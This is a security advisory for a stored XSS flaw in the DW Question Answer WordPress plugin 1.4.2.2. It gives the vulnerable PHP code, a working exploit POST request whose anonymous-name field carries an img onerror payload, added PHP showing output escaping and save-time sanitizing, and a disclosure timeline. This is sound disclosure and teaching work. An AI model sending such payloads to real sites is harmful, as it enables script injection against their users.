#Product : DW Question Answer
#Exploit Author : Rahul Pratap Singh
#Version : 1.4.2.2
#Home page Link : https://wordpress.org/plugins/dw-question-answer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 11/3/2016
XSS Vulnerability:
----------------------------------------
Description:
----------------------------------------
The "_dwqa_anonymous_name" parameter, submitted when a question is asked anonymously, is stored in post meta without sanitization and later returned as the author display name without output escaping, which leads to stored XSS on any page that renders the question's author.
----------------------------------------
Vulnerable Code:
----------------------------------------
User.php
function dwqa_get_author( $post_id = false ) {
    if ( !$post_id ) {
        $post_id = get_the_ID();
    }
    $display_name = false;
    if ( dwqa_is_anonymous( $post_id ) ) {
        // Attacker-controlled: the value submitted as _dwqa_anonymous_name is
        // read back from post meta exactly as it was saved.
        $anonymous_name = get_post_meta( $post_id, '_dwqa_anonymous_name', true );
        if ( $anonymous_name ) {
            $display_name = $anonymous_name;
        } else {
            $display_name = __( 'Anonymous', 'dwqa' );
        }
    } else {
        $user_id = get_post_field( 'post_author', $post_id );
        $display_name = get_the_author_meta( 'display_name', $user_id );
    }
    // Returned without esc_html()/esc_attr(); callers print it into markup as-is.
    return apply_filters( 'dwqa_get_author', $display_name, $post_id );
}
----------------------------------------
Exploit:
----------------------------------------
POST /index.php/dwqa-ask-question/ HTTP/1.1

question-title=abc&question-content=%3Cp%3Eabc%3C%2Fp%3E&question-category=2&question-tag=abc&_dwqa_anonymous_email=abc%40gmail.com&_dwqa_anonymous_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%21--&_wpnonce=3164a8f439&_wp_http_referer=%2Fwp442%2Findex.php%2Fdwqa-ask-question%2F&dwqa-question-submit=Submit

The _dwqa_anonymous_name value decodes to "><img src=x onerror=alert(1)><!-- : the leading "> closes the attribute the name is printed into, the <img onerror> fires on render, and the trailing <!-- comments out whatever markup follows. The _wpnonce value is tied to the session and must be taken from the live ask-question form.
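The following is an added example, not code from the advisory or from the DW Question Answer plugin. It reproduces in plain PHP why the stored _dwqa_anonymous_name value above becomes script when rendered, and shows the two fixes a practitioner would apply: escape at the output sink, and sanitize on save as defence in depth. It assumes the name is printed both inside an HTML attribute and as element text (the "> at the start of the payload is built to break out of an attribute), and it uses htmlspecialchars() in place of WordPress's esc_attr()/esc_html(), which wrap the same call; the class name dwqa-author and the helper names are illustrative.

```php
<?php
// Added example (not the plugin's code). Runs on php-cli with ext-dom.

// The _dwqa_anonymous_name value from the exploit request, URL-decoded.
const PAYLOAD = '"><img src=x onerror=alert(1)><!--';

// Vulnerable pattern: the raw stored value is concatenated into markup,
// which is what happens when dwqa_get_author() hands it back unescaped.
function render_author_vulnerable(string $name): string
{
    return '<a class="dwqa-author" title="' . $name . '">' . $name . '</a>';
}

// Hardened pattern: escape for the context the value lands in.
// ENT_QUOTES escapes both quote styles, so an attribute cannot be closed early.
function esc_for_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_author_hardened(string $name): string
{
    return '<a class="dwqa-author" title="' . esc_for_html($name) . '">'
        . esc_for_html($name) . '</a>';
}

// Defence in depth: sanitize on save as well, so the post meta never holds
// markup. Rough stand-in (assumption) for WordPress's sanitize_text_field():
// strip tags, collapse whitespace, trim.
function sanitize_name_on_save(string $name): string
{
    $name = strip_tags($name);
    return trim(preg_replace('/\s+/', ' ', $name));
}

// Parser-based check: how many attributes in the rendered fragment are
// on* event handlers? libxml's HTML parser is used instead of a regex
// because a regex cannot tell escaped text from a real attribute.
function count_event_handlers(string $html): int
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body><div>' . $html . '</div></body></html>');
    libxml_clear_errors();
    $count = 0;
    foreach ($doc->getElementsByTagName('*') as $el) {
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                $count++;
            }
        }
    }
    return $count;
}

$vuln = render_author_vulnerable(PAYLOAD);
$safe = render_author_hardened(PAYLOAD);

printf("vulnerable markup : %s\n", $vuln);
printf("  event handlers  : %d\n", count_event_handlers($vuln));
printf("hardened markup   : %s\n", $safe);
printf("  event handlers  : %d\n", count_event_handlers($safe));
printf("after save-time sanitizing: %s\n", sanitize_name_on_save(PAYLOAD));
```

The vulnerable rendering yields a real <img> element carrying an onerror attribute, while the hardened rendering contains the payload only as inert text. Escaping at the sink is the fix that actually closes the bug; sanitizing on save limits the blast radius if some other template later prints the meta value without escaping.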
----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/03/dwqa_stored_xss.png
Fix:
Update to 1.4.2.3
Vulnerability Disclosure Timeline:
- March 3, 2016: Bug discovered, initial report to WordPress
- March 7, 2016: No response, report sent again
- March 8, 2016: WordPress responded, plugin taken down
- March 11, 2016: Vendor deployed a patch
#######################################
# CTG SECURITY SOLUTIONS #
# www.ctgsecuritysolutions.com #
#######################################
Pub Ref:
https://wordpress.org/plugins/dw-question-answer/changelog/